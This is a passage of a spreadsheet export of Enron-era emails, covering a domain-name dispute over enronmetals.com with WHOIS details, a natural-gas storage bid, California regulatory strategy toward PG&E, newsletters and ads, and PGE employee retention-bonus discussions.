Also, can you contact EasySpace, the host/ISP for both enronmetals.com and _x000D_
enronmetals.co.uk to instruct them that the names are in dispute so we can _x000D_
have the .com site suspended?  The enronmetals.co.uk site simply calls up a _x000D_
'holding page' at the moment:_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
EasySpace can be reached at:_x000D_
_x000D_
Technical Contact, Registrar:_x000D_
   "Mr Easyspace Hostmaster" &lt;hostmaster@easyspace.com&gt;_x000D_
   Phone: http://www.easyspace.com/   Fax:   +44 1932 350 222_x000D_
_x000D_
(For the .co.uk  name, I believe Nominet (http://www.nominet.org.uk/) will _x000D_
have to authorize the ownership transfer, whereas for the .com name, _x000D_
EasySpace should be able to handle the transfer).  _x000D_
_x000D_
Hope this helps._x000D_
-Paul_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Justin Boyd@ECT_x000D_
17/10/2000 18:58_x000D_
To: sbrown@velaw.com_x000D_
cc: Mark Holsworth/Corp/Enron@ENRON, Mark Taylor/HOU/ECT@ECT, Paul _x000D_
Goddard/EU/Enron@Enron _x000D_
_x000D_
Subject: Relevant Facts: EnronMetals.com_x000D_
_x000D_
Scott_x000D_
_x000D_
Please see below_x000D_
_x000D_
Justin_x000D_
_x000D_
---------------------- Forwarded by Justin Boyd/LON/ECT on 17/10/2000 19:00 _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Paul Goddard@ENRON_x000D_
17/10/2000 18:58_x000D_
To: Paul Goddard/EU/Enron@Enron_x000D_
cc: Justin Boyd/LON/ECT@ECT, Felipe Foy/LON/ECT@ECT _x000D_
_x000D_
Subject: Relevant Facts: EnronMetals.com_x000D_
_x000D_
_x000D_
Timeline with Relevant Facts/Events:_x000D_
_x000D_
18 May '00 - Enron announces acquisition of MG plc  (soon to be renamed Enron _x000D_
Metals Limited)_x000D_
18 Jun '00 - Peter Quine purchases two domain names: EnronMetals.com  and _x000D_
EnronMetals.co.uk_x000D_
_x000D_
&lt;&lt;correspondence among parties - Enron ext. legal counsel, Scott Brown of _x000D_
Vinson &amp; Elkins LLP, and Mr. Peter Quine -  &gt;&gt;_x000D_
_x000D_
21 Jul ' 00 - Letter from Vinson &amp; Elkins sent to Peter Quine _x000D_
 7 Aug' 00 - Letter sent by Peter Quine to Vinson &amp; Elkins (letter received _x000D_
11 Aug '00)_x000D_
22 Aug '00 - Email from Scott Brown to Peter Quine_x000D_
???_x000D_
_x000D_
The documents corresponding to the above dates were already forwarded to you _x000D_
by Justin Boyd.  Further relevant facts may be forthcoming from Felipe Foy of _x000D_
our IT team, but I believe you now have more than sufficient factual _x000D_
information to proceed with this. _x000D_
_x000D_
I also strongly suggest that the ISPs hosting these sites are immediately _x000D_
notified of pending arbitration in both the US and UK so that the 2 websites _x000D_
will be suspended from operation immediately.  I believe in the US (and _x000D_
v.likkely the UK) that the hosting ISP must by law suspend any websites until _x000D_
the domain name dispute resolution process has been carried out, though I may _x000D_
be mistaken._x000D_
_x000D_
_x000D_
Paul Goddard_x000D_
_x000D_
_x000D_
Details:_x000D_
_x000D_
   _x000D_
Registrant:_x000D_
Mr peter quine_x000D_
   9 park crescent_x000D_
   brighton_x000D_
   e.sussex_x000D_
   bn23ha_x000D_
   UK_x000D_
_x000D_
Domain Name: enronmetals.com_x000D_
_x000D_
Administrative Contact, Billing Contact:_x000D_
   Mr peter quine &lt;peter@yesyes.com&gt;_x000D_
   Phone: 01273 389159_x000D_
   Fax:   _x000D_
Technical Contact, Registrar:_x000D_
   Mr Easyspace Hostmaster &lt;hostmaster@easyspace.com&gt;_x000D_
   Phone: http://www.easyspace.com/_x000D_
   Fax:   +44 1932 350 222_x000D_
_x000D_
   Record last updated on 2000-10-02_x000D_
_x000D_
_x000D_
______________________________________________x000D_
_x000D_
Domain Name: enronmetals.co.uk   _x000D_
   Registered For: peter quine_x000D_
   Domain Registered By: EASYSPACE   Registered on 18-Jun-2000._x000D_
   Domain servers listed in order:_x000D_
   NS1.EASYPOST.COM                  216.167.71.20_x000D_
   NS3.EASYPOST.COM                  216.167.71.24_x000D_
   WHOIS database last updated at 16:10:01 17-Oct-2000_x000D_
The NIC.UK Registration Host contains ONLY information for domains_x000D_
within co.uk, org.uk, net.uk, ltd.uk and plc.uk.  Please use the whois_x000D_
server at rs.internic.net for Internet Information or the whois server_x000D_
at nic.ddn.mil for MILNET Information._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
._x000D_
   Record created on 2000-06-18._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 10 Jan 2002 13:05:22 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ed.mcmichael@enron.com', 'steve.van@enron.com'})</t>
  </si>
  <si>
    <t>FW: NGPL Storage Transfer</t>
  </si>
  <si>
    <t>Steve, could you please review this document._x000D_
_x000D_
Thanks _x000D_
Joe_x000D_
_x000D_
-----Original Message-----_x000D_
From: Frihart, Bryant _x000D_
Sent: Thursday, January 10, 2002 1:36 PM_x000D_
To: McMichael Jr., Ed; Pollan, Sylvia S.; Parks, Joe_x000D_
Subject: FW: NGPL Storage Transfer_x000D_
_x000D_
_x000D_
For your review. Please advise if I can be of assistance._x000D_
_x000D_
-----Original Message-----_x000D_
From: McCartney, William [mailto:William.McCartney@ElPaso.com]_x000D_
Sent: Thursday, January 10, 2002 12:06 PM_x000D_
To: Frihart, Bryant_x000D_
Cc: Brown, Chuck; Coyle, Kevin; Fishbeck, Don_x000D_
Subject: NGPL Storage Transfer_x000D_
_x000D_
_x000D_
Bryant,_x000D_
_x000D_
El Paso Merchant Energy (El Paso) is pleased to respond to Enron North_x000D_
America's (Enron) request seeking parties interested in NGPL storage_x000D_
inventory dated December 19, 2001.  El Paso would be interested in an_x000D_
"inventory transfer" that abides by the terms detailed in the attached_x000D_
document.  We appreciate the opportunity to participate in this bidding_x000D_
process and look forward to your response.  If you have any questions,_x000D_
please contact me._x000D_
_x000D_
Bill_x000D_
_x000D_
_x000D_
_x000D_
 &lt;&lt;ENA NGPL NSS Transfer.doc&gt;&gt; _x000D_
_x000D_
_x000D_
******************************************************************_x000D_
This email and any files transmitted with it from the ElPaso _x000D_
Corporation are confidential and intended solely for the _x000D_
use of the individual or entity to whom they are addressed. _x000D_
If you have received this email in error please notify the _x000D_
sender._x000D_
******************************************************************</t>
  </si>
  <si>
    <t>Thu, 28 Sep 2000 11:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: California Strategy RE: PG&amp;E</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Jeff Dasovich/NA/Enron on 09/28/2000 06:14 PM -----_x000D_
_x000D_
	Mary Hain@ECT_x000D_
	09/28/2000 05:38 PM_x000D_
		 _x000D_
		 To: Susan J Mara/SFO/EES@EES, Mona Petrochko, jdasovic@ees.enron.com_x000D_
		 cc: Christopher F Calger/PDX/ECT@ECT_x000D_
		 Subject: Re: California Strategy RE: PG&amp;E_x000D_
_x000D_
FYI_x000D_
---------------------- Forwarded by Mary Hain/HOU/ECT on 09/28/2000 03:45 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Christopher F Calger_x000D_
09/25/2000 08:00 AM_x000D_
To: James D Steffes/HOU/EES@EES_x000D_
cc: Tim Belden/HOU/ECT@ECT, Mary Hain/HOU/ECT@ECT, Chris H _x000D_
Foster/HOU/ECT@ECT, David Parquet/SF/ECT@ECT, Michael McDonald/SF/ECT@ECT, _x000D_
Laird Dyer/SF/ECT@ECT _x000D_
Subject: Re: California Strategy RE: PG&amp;E  _x000D_
_x000D_
Thanks Jim.  ENA is very interested in this topic.  I was talking with Mona _x000D_
last week about my view that a strategy with PG&amp;E should be supportive, not _x000D_
adversarial.    ENA is extremely interested in a gas management position with _x000D_
PG&amp;E and they have made it clear to us that our public positions against them _x000D_
are a significant commercial issue.  I will spend some time with Portland and _x000D_
SF to get an ENA consensus on these points._x000D_
_x000D_
Chris_x000D_
_x000D_
_x000D_
_x000D_
James D Steffes@EES_x000D_
09/21/2000 09:28 PM_x000D_
To: Tim Belden/HOU/ECT@ECT, Mary Hain/HOU/ECT@ECT, Chris H _x000D_
Foster/HOU/ECT@ECT, Christopher F Calger/PDX/ECT@ECT_x000D_
cc:  _x000D_
Subject: California Strategy RE:  PG&amp;E_x000D_
_x000D_
FYI.  _x000D_
_x000D_
If you are not aware, PG&amp;E is pushing for immediate end of their retail rate _x000D_
cap (so they can collect wholesale energy costs).  _x000D_
_x000D_
EES is considering its positions in that matter to prepare for CPUC and _x000D_
legislative proceedings._x000D_
_x000D_
I want to make sure that you are aware of these internal discussions.  Key _x000D_
from EPMI include (1) endorse Cal ISO report conclusions, (2) competititve _x000D_
default supplier, (3) increasing rate freeze for all customers, and (4) _x000D_
transfer of PG&amp;E Hydro to affiliate at $2.8B (to offset current _x000D_
undercollection)._x000D_
_x000D_
Please let me know if these positions make sense to you.  While I think that _x000D_
our general position is retail volatility, given the current situation in _x000D_
SDG&amp;E that is simply impossible politically._x000D_
_x000D_
Please feel free to call._x000D_
_x000D_
Jim_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by James D Steffes/HOU/EES on 09/21/2000 _x000D_
10:39 PM ---------------------------_x000D_
From: Harry Kingerski@ENRON on 09/21/2000 03:54 PM_x000D_
To: James D Steffes/HOU/EES@EES, Paul Kaufman/PDX/ECT@ECT, Jeff _x000D_
Dasovich/SFO/EES@EES, Mona L Petrochko/SFO/EES@EES, Susan J Mara/SFO/EES@EES_x000D_
cc: Richard Shapiro/HOU/EES@EES, Roger Yang/SFO/EES@EES _x000D_
Subject: _x000D_
_x000D_
I met with Dennis Benevides, Jim Wood and Scott Gahn about the PG&amp;E strategy _x000D_
we discussed and the EES perspective.  Suggestions:_x000D_
_x000D_
Endorse the recent CAL ISO report on causes of the problem (no utility _x000D_
forward buying, no demand responsiveness, etc) and say, with a few tweaks, _x000D_
their proposals were on target._x000D_
_x000D_
Get CTC roll-off no earlier than Spring '01.  Retroactive roll-off would be _x000D_
devastating._x000D_
_x000D_
Use PG&amp;E $15 billion exposure as leverage to get competitive default supplier _x000D_
in place (get them out of merchant supply)._x000D_
_x000D_
Impose a stair-step shape on the rate increase, to prompt customer migration._x000D_
_x000D_
Keep PG&amp;E somewhat at risk for wholesale cost recovery, delay recovery of _x000D_
under-recoveries until out years. _x000D_
_x000D_
Keep rate freeze (which is preferable to rate cap) to as short a period as _x000D_
possible, post '01._x000D_
_x000D_
Here is a rework of Jim's bullet points to incorporate these thoughts:_x000D_
  Keep in mind the numbers are all just placeholders and are not meant to be _x000D_
definitive.  Once we start to hone in on the concept, we can develop the _x000D_
right numbers._x000D_
_x000D_
From a retail perspective, this blends protection of the book with _x000D_
advancement of new market opportunity.  I may still get more feedback from _x000D_
the EES guys, but wanted to give you what I got so far._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 08:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Texas Eastern</t>
  </si>
  <si>
    <t>http://infopost.link.duke-energy.com/infopost_x000D_
_x000D_
Eric Gillaspie_x000D_
713-345-7667_x000D_
Enron Building 3886</t>
  </si>
  <si>
    <t>Mon, 21 May 2001 01:34:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'csleuth@email.infonautics.com'})</t>
  </si>
  <si>
    <t>Company Sleuth Daily Report for WMSON</t>
  </si>
  <si>
    <t>Company Sleuth Daily Report_x000D_
==========================_x000D_
Company Sleuth is a registered trademark of Infonautics, Inc. (Nasdaq: INFO) or its subsidiaries._x000D_
-----------------------------_x000D_
_x000D_
Special Notice:_x000D_
-----------------------------_x000D_
Coming Soon ..._x000D_
Company Sleuth Research Library_x000D_
_x000D_
    We understand it is important for you to know what decisions your Stakeout companies have made and what they are planning for the future.  Having access to this information can help you anticipate the potential impact on their stock performance._x000D_
_x000D_
    That's why we are introducing the Company Sleuth Research Library, one of the most powerful research resources available to individual investors._x000D_
_x000D_
    With the Company Sleuth Research Library, you will be empowered to search over 10 million articles from top domestic and international media sources to find the company, industry, market or general information you need._x000D_
_x000D_
    This service can only be found at Company Sleuth, providing yet another unique investment resource that sets it apart from other investment sites._x000D_
_x000D_
    Look for the Company Sleuth Research Library to be part of the upcoming subscription service.  With the subscription service, you will gain access to the most current, relevant information and research tools to help you make more informed strategic decisions on your investments._x000D_
_x000D_
    As a subscriber, you will have access to all of Company Sleuth services, including the following:_x000D_
    ?	A Stakeout list so you can track new findings on up to 50 companies_x000D_
    ?	Over 25 in-depth company reports_x000D_
    ?	Ability to conduct searches through the Company Sleuth Research Library_x000D_
    ?	Email notifications to alert you to the new findings on your Stakeout companies_x000D_
    ?	Plus more_x000D_
_x000D_
    Once available, you can subscribe for this new service and begin your subscription with a FREE 14-day trial. If you choose not to subscribe, your account will be shifted to a limited access membership status with restricted use of the Company Sleuth services._x000D_
_x000D_
    Watch the site and your email for more information on how to sign up for the subscription service.  Click here &lt;http://www.companysleuth.com/snapshot_demo.cfm&gt; for a sample of the new Snapshot page._x000D_
_x000D_
------------------------------_x000D_
This is your Personal Company Sleuth Report for Monday May 21, 2001._x000D_
-------------------------------_x000D_
Your Stakeout Companies_x000D_
-------------------------------_x000D_
Here are the new items Company Sleuth found on your stakeout companies last night._x000D_
_x000D_
Enron Corp. (ENE)_x000D_
	Raging Bull Msg.................7_x000D_
	Yahoo Msg.......................13_x000D_
	Motley Fool Msg.................7_x000D_
	Rabbitt Ratings.................1_x000D_
	CNBC Msg........................80_x000D_
	To view this company's report, go to:_x000D_
	http://www.companysleuth.com/login/email_login.cfm?actiontype=6&amp;username=WMSON&amp;ticker=ENE_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
About Company Sleuth_x000D_
--------------------_x000D_
"?Company Sleuth electronically tracks companies of your choosing on what's called the Stakeout List. The Stakeout List includes some obscurities such as domain name registrations and patents as well as more run-of-the-mill information such as insider trades, news, and broker reports. The number of message board postings on a stock is displayed in a chart, indicating whether the buzz is heating up or petering out. You don't even need to visit the site regularly-Company Sleuth will e-mail the results so you can pick and choose what to read."_x000D_
- "13 Sites That Put You Above The Crowd" by Paul Barr, OnlineInvestor, November 2000_x000D_
_x000D_
_x000D_
Customize Company Sleuth_x000D_
------------------------_x000D_
CompanySleuth has revised its Privacy Policy.  Click here  http://www.companysleuth.com/privacy.cfm to view the revised Privacy Policy._x000D_
_x000D_
Cancel E-mail_x000D_
http://www.companysleuth.com/login/email_login.cfm?username=WMSON&amp;actiontype=1_x000D_
_x000D_
Contact Company Sleuth_x000D_
http://www.companysleuth.com/login/email_login.cfm?username=WMSON&amp;actiontype=2_x000D_
_x000D_
Change Stakeout Companies_x000D_
http://www.companysleuth.com/login/email_login.cfm?username=WMSON&amp;actiontype=3_x000D_
_x000D_
Modify E-mail Content_x000D_
http://www.companysleuth.com/login/email_login.cfm?username=WMSON&amp;actiontype=4_x000D_
_x000D_
Change to HTML E-mail_x000D_
http://www.companysleuth.com/login/email_login.cfm?username=WMSON&amp;actiontype=5_x000D_
_x000D_
_x000D_
Company Sleuth is a registered trademark of Infonautics, Inc. (Nasdaq: INFO) or its subsidiaries._x000D_
Copyright 2000 Infonautics Corporation http://www.infonautics.com</t>
  </si>
  <si>
    <t>Wed, 31 Oct 2001 08:04:50 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'c..koehler@enron.com', 'tana.jones@enron.com', 'marie.heard@enron.com'})</t>
  </si>
  <si>
    <t>subject of email was:  Cincinnati Gas &amp; Electric Corp. and Cinergy_x000D_
 Energy Services, Inc. (agent)</t>
  </si>
  <si>
    <t>Tue, 22 Aug 2000 01:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'michael.anderson@enron.com'})</t>
  </si>
  <si>
    <t>RAB Graph</t>
  </si>
  <si>
    <t xml:space="preserve">I believe this will be helpful in your analysis._x000D_
_x000D_
---------------------- Forwarded by Michael Anderson/HOU/AZURIX on 08/22/2000 _x000D_
08:35 AM ---------------------------_x000D_
From: Keith Harris/WSX/AZURIX@Exchange on 08/03/2000 01:40 PM GDT_x000D_
To: Michael Anderson/HOU/AZURIX@AZURIX_x000D_
cc: Colin Skellett/WSX/AZURIX@Exchange _x000D_
_x000D_
Subject: FW: Amended Index Graph_x000D_
_x000D_
_x000D_
Michael_x000D_
_x000D_
I have got CSFB working on the amendment you asked for._x000D_
_x000D_
In the meantime we have produced a graph which shows, as indices, market _x000D_
values of the water companies and the RAB of the industry since _x000D_
privatisation.  The following points come out_x000D_
1 Market values overtime have been 1.1x RAB_x000D_
2 The result is significantly skewed by the period between Mid 1997 and end _x000D_
1998 when the ratio was c1.5x._x000D_
3 The premium to RAB is only found at a time when political uncertainty has _x000D_
been removed the companies are able to outperform the regulatory deal _x000D_
significantly.  Those days are gone - a fact witnessed by the decline in _x000D_
share prices in the last year_x000D_
_x000D_
Just to note that the graph we have produced here is a weighted average of _x000D_
water companies - whereas the figures we did yesterday on the RAB market _x000D_
value ratio is a straight average.  Obviously that influences the numbers a _x000D_
little._x000D_
_x000D_
On CustomerCo.  CSFB have contacted around 7 energy companies.  The result _x000D_
has been positive and they are prepared to enter our journal exercise.  I _x000D_
await a revised fee proposal but CSFB have been advised that it should be _x000D_
more modest than the last one !_x000D_
_x000D_
Keith _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  David Kitchener  _x000D_
Sent: 03 August 2000 13:27_x000D_
To: Keith Harris_x000D_
Subject: Amended Index Graph_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 10 Jun 2002 16:07:43 -0700 (PDT)</t>
  </si>
  <si>
    <t>EES CA SCHEDULE for 6/12/02</t>
  </si>
  <si>
    <t xml:space="preserve">The attached schedule is for Wednesday, June 12.  Associated text files have been posted to Sparky._x000D_
_x000D_
       _x000D_
_x000D_
_x000D_
_x000D_
Michael R. Frazier_x000D_
Manager, Load Forecasting_x000D_
Enron Energy Services_x000D_
Office: 713-345-3200_x000D_
Pager: 877-926-0615_x000D_
P-mail: 8779260615@skytel.com_x000D_
</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 13:59:41 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.wester@austinenergy.com'})</t>
  </si>
  <si>
    <t>Outage for Friday</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
John,_x000D_
The outage requested for Friday has been approved by Kevin Presto.      I am glad to hear that the demin tank situation has been resolved._x000D_
The meeting that I attended was helpful in understanding your level of frustration.   _x000D_
_x000D_
If you have further questions,  please let me know._x000D_
_x000D_
John Forney_x000D_
</t>
  </si>
  <si>
    <t>Fri, 15 Feb 2002 10:04:19 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Well I won't need a seeing eye dog</t>
  </si>
  <si>
    <t>how many fingers am I holding up??    Glad to hear it went well.  Have a nice long weekend!!!!!!!!!1_x000D_
_x000D_
-----Original Message-----_x000D_
From: Wadle, Susan _x000D_
Sent: Friday, February 15, 2002 12:01 PM_x000D_
To: Gadd, Eric; Hyatt, Kevin_x000D_
Subject: Well I won't need a seeing eye dog_x000D_
_x000D_
_x000D_
vision is pretty blurry, but will clear up a little bit every day.  I can't see through my glasses anymore because they have a correction.  He wants me to wait at least 6 weeks before deciding the strength of any correction.  I have to see him again in a couple of weeks.  I  can actually see better in the right eye than I could in the left after they did that one, but we did the worst one first, so that is probably why.  Anyway, all is well.  I'm staying in today but hope to get out some tomorrow and Sunday and Monday, of course. _x000D_
 _x000D_
Hope you both have a wonderful weekend.</t>
  </si>
  <si>
    <t>Mon, 4 Jun 2001 20:28:09 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'info@specials.sears.com'})</t>
  </si>
  <si>
    <t>Surprise Your Hero this Father's Day</t>
  </si>
  <si>
    <t>_x000D_
    sears.com Visit sears.com for great Father's Day gift ideas Gift Center=_x000D_
 [IMAGE]Electronics [IMAGE]Lawn and Garden [IMAGE]Tools [IMAGE]Gift Card [I=_x000D_
MAGE]Sweepstakes        Free Shipping* on many Father's Day gift ideas!    =_x000D_
Craftsman_x000D_
 101pc. Mechanic's Tool Set, 00933101Craftsman_x000D_
 101pc. Mechanic's Tool Set  Sale $69.99   Sony Camcorder, 05758861Sony Cam=_x000D_
corder  Sears Low Price $599.99   Panasonic 27in. TV, 05747511Panasonic 27"=_x000D_
 TV  Sale $289.99       Craftsman_x000D_
 10in. Miter Saw, 00924315Craftsman_x000D_
 10" Miter Saw  Sale $189.05   Remington_x000D_
 Rotary Shaver, 00868400Remington Rotary Shaver_x000D_
  Sale $74.99   Hewlett Packard, 00353601Hewlett Packard Digital Camera  Se=_x000D_
ars Low Price $199.99  Visit our Gift Center  for more great Father's Day i=_x000D_
deas    Briggs &amp; Stratton Days  SAVE $50 - $400 after mail-in rebate**  Cli=_x000D_
ck here  for details &amp; exclusions.    With Sears Gift Card, let Dad choose =_x000D_
his gift.  With Sears Gift Card, let Dad choose his gift. Simply order at w=_x000D_
ww.sears.com/giftcard      Dads/Grads Sweeps  Enter Dad for a chance to win=_x000D_
 one of 25 Craftsman tool prize packages in the Craftsman Do-It-Himself Giv=_x000D_
eaway ***     [IMAGE]    If you would no longer like to receive e-mailed sp=_x000D_
ecial events information, sales notifications, or other messages from sears=_x000D_
.com, please click here  and follow the "Unsubscribe" instructions. Or repl=_x000D_
y to this email with "Unsubscribe" in the subject line.  Your e-mail addres=_x000D_
s will be removed within 5 business days from our email marketing list. Tha=_x000D_
nk you!   * Free shipping with mail-in rebate on the following Father's Day=_x000D_
 Gift Ideas : Portable Power Tools, Power Tool Accessories, Mechanics Tools=_x000D_
, Tool Sets, Hand Tools: General Purpose and Carpentry, Camcorders, DVD Pla=_x000D_
yers, VCRs, Car Electronics, Home Theater Systems, PDAs, Personal CD Player=_x000D_
s and Notebook Computers purchased from sears.com between 5/27/01 - 6/09/01=_x000D_
.   ** Offer good on qualifying mowers and tractors over $199 with a Briggs=_x000D_
 and Stratton engine purchased between June 3, 2001 and June 16, 2001. See =_x000D_
sears.com  for form and additional details.  *** CONDENSED RULES: No purcha=_x000D_
se necessary. From 12:01 a.m. EST on 5/13/01 through 11:59 p.m. EST on 6/16=_x000D_
/01 you can enter the sweepstakes online at sears.com. Must be 18 years or =_x000D_
older and a legal U.S. resident. Void outside the 50 United States and DC a=_x000D_
nd where prohibited. For full Official Rules see sears.com.        =09_x000D_
_x000D_
Message-Id: &lt;20010604202809.4DAF.407367-8453@specials.sears.com&gt;_x000D_
 [IMAGE]</t>
  </si>
  <si>
    <t>Thu, 26 Oct 2000 02:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'victoria.wilbeck@enron.com'})</t>
  </si>
  <si>
    <t>Re: Cutter Oil Company</t>
  </si>
  <si>
    <t>http://edms.livelink.enron.com/ena/livelink.exe/96029215_01-Jun-1997_2.pdf?fun_x000D_
c=doc.Fetch&amp;nodeId=3836183&amp;docTitle=96029215+01%2DJun%2D1997+2_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490</t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 08:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'aaron.brown@enron.com'})</t>
  </si>
  <si>
    <t>RE: PGE retention program</t>
  </si>
  <si>
    <t xml:space="preserve">Friday is fine with me._x000D_
_x000D_
_x000D_
From: Aaron Brown/ENRON@enronXgate on 04/24/2001 02:24 PM_x000D_
To: Stanley Horton/Corp/Enron@Enron_x000D_
cc: PEGGY FOWLER/ENRON@enronxgate, Mary Joyce/ENRON@enronXgate _x000D_
_x000D_
Subject: RE: PGE retention program_x000D_
_x000D_
I can have this all finalized by Friday May 13.  Peggy/Stan - Let me know if _x000D_
you need it done sooner.  thanks, Aaron_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Horton, Stanley  _x000D_
Sent: Tuesday, April 24, 2001 1:33 PM_x000D_
To: Brown, Aaron (Executive Comp)_x000D_
Cc: FOWLER, PEGGY; Joyce, Mary_x000D_
Subject: Re: PGE retention program_x000D_
_x000D_
I am ok with all of this.  When can we finalize?_x000D_
_x000D_
_x000D_
From: Aaron Brown/ENRON@enronXgate on 04/24/2001 10:42 AM_x000D_
To: Stanley Horton/Corp/Enron@Enron, PEGGY FOWLER/ENRON@enronxgate_x000D_
cc: Mary Joyce/ENRON@enronXgate _x000D_
_x000D_
Subject: PGE retention program_x000D_
_x000D_
Here's the updated spreadsheet based on Peggy's email and our understanding _x000D_
of the programs._x000D_
_x000D_
Peggy, Joyce's reason for requesting an exception for Mary Turina (front _x000D_
loading and increasing retention bonus or guarantee payment of sales bonus) _x000D_
is "Due to the special nature of the trading floor and the on-going need we _x000D_
have to retain people in this area"...here's how I see it_x000D_
_x000D_
Factors:_x000D_
(1) seems like Mary just went into that position...but, if she's already _x000D_
established a reputation and is being heavily recruited, then maybe a higher _x000D_
number on retention is justifiable_x000D_
(2) she works 80% - i know that's not indicative of productivity, but it _x000D_
seems our flexibility should be worth something in the retention bucket_x000D_
(3) she only has about $100k of unvested equity remaining_x000D_
(4) as currently contemplated, Piro and Lesh would get about $250k (compared _x000D_
to $200k for Mary) in retention value - but this points back to (2) somewhat _x000D_
and potential internal inequity issues if increased values or exceptions get _x000D_
out_x000D_
_x000D_
The most important factors are:_x000D_
(5) the risk of losing Mary to a competitor and _x000D_
(6) whether that loss would significantly disrupt the sale process or ongoing _x000D_
operations of PGE_x000D_
If these factors are, in fact, problems, then it probably makes sense to _x000D_
increase Mary's retention bonus.  If we get into front loading her retention _x000D_
bonus, then I'd want to get some strong non-compete and non-solicitation _x000D_
language in the documents.  The reason for front-loading the retention grants _x000D_
for Fowler/Miller is to provide some consideration/incentive for giving up _x000D_
"window" payments._x000D_
_x000D_
Peggy, if you still feel strongly about increasing Mary's retention bonus _x000D_
after reviewing my thoughts, I don't have a problem with $250k, but if we _x000D_
start to get into the $300k - $400k range or front-loading any portion, I'd _x000D_
like to get Stan's sign-off._x000D_
_x000D_
Aaron_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: FOWLER, PEGGY _x000D_
Sent: Monday, April 23, 2001 7:02 PM_x000D_
To: Brown, Aaron (Executive Comp); Horton, Stanley_x000D_
Cc: Joyce, Mary_x000D_
Subject: Re: PGE retention program_x000D_
_x000D_
_x000D_
Thank you for the summary Aaron, I don't think you misrepresented anything,_x000D_
but there are a couple places that I have questions, or the amounts you show_x000D_
are different than what I was expecting._x000D_
1)My records showed our last discussion around Lobdell showed his sales bonus_x000D_
at $225,000. and this shows $250,000. which I am OK with, but if total dollars_x000D_
are limited, I might need the $25,000. for some other individuals._x000D_
2) I had emailed before that Quennoz, Johnson, and Ryder were lower than the_x000D_
last plan, although this was the 'old' retention  plan. I had propposed_x000D_
Quennoz and Johnson going to $250,000., which gets them to previous level, and_x000D_
Ryder to $225,000., and that Barnett would need an increase to keep equity to_x000D_
$225,000. If $250,000. is too high for Johnson and Quennoz, I could probably_x000D_
be OK with $225,000. for each of them, but they should be as high as Nichols,_x000D_
and Barnett should also be as high as Nichols._x000D_
3)I had also had Joyce Bell ask you a question about Mary Turina, and payment_x000D_
of sales bonus at earlier of sale or some timeframe like 2 to 3 years._x000D_
Probably what I'm really suggesting here, is maybe we need to increase her_x000D_
retention, and decrease her sales or something like that, and a front loading_x000D_
might work here too, with incentive to have to stay.   _x000D_
Thanks for all your help and work on this Aaron. Please call if you have_x000D_
problems understand my notes. 503-464-8401 _x000D_
&gt;&gt;&gt; Brown, Aaron (Executive Comp) 04/23/01 01:14PM &gt;&gt;&gt;_x000D_
Here are the numbers for the PGE retention programs.  _x000D_
_x000D_
Stan, I've reviewed Peggy's recommendations for these programs (Retention and_x000D_
Sales Bonus Programs) and they seem reasonable in light of the imminent_x000D_
divestiture of PGE and our associated needs - let me know if you're ok with_x000D_
the numbers._x000D_
_x000D_
Peggy, let me know if I've misrepresented anything._x000D_
_x000D_
I will be working with Kriste Sullivan (Enron attorney) to implement these_x000D_
agreements and supercede the prior agreements.  We are hoping to have the_x000D_
agreements signed and executed by May 13._x000D_
_x000D_
Aaron_x000D_
 &lt;&lt; File: PGEretention.xls &gt;&gt; _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 17 Sep 2001 08:21:11 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bjorn.hagelmann@enron.com', 'jeff.skilling@enron.com', 'james.new@enron.com', 'tammie.schoppe@enron.com', 'kimberly.hillis@enron.com', 'sally.beck@enron.com', 'c..gossett@enron.com', 'l..nowlan@enron.com', 'cassi.wallace@enron.com', 'm.hall@enron.com', 'rick.buy@enron.com', 'william.kelly@enron.com', 'john.swinney@enron.com', 'cassandra.schultz@enron.com', 'frank.hayden@enron.com', 'kenneth.thibodeaux@enron.com', 'louise.kitchen@enron.com', 'ted.murphy@enron.com', 'm..taylor@enron.com', 'john.allison@enron.com', 'mike.jordan@enron.com', 'beth.apollo@enron.com', 'todd.hall@enron.com', 'david.port@enron.com', 'michael.kass@enron.com', 'chris.abel@enron.com'})</t>
  </si>
  <si>
    <t>ERV Notification:  (Violation/Notification Memo - 09/14/2001)</t>
  </si>
  <si>
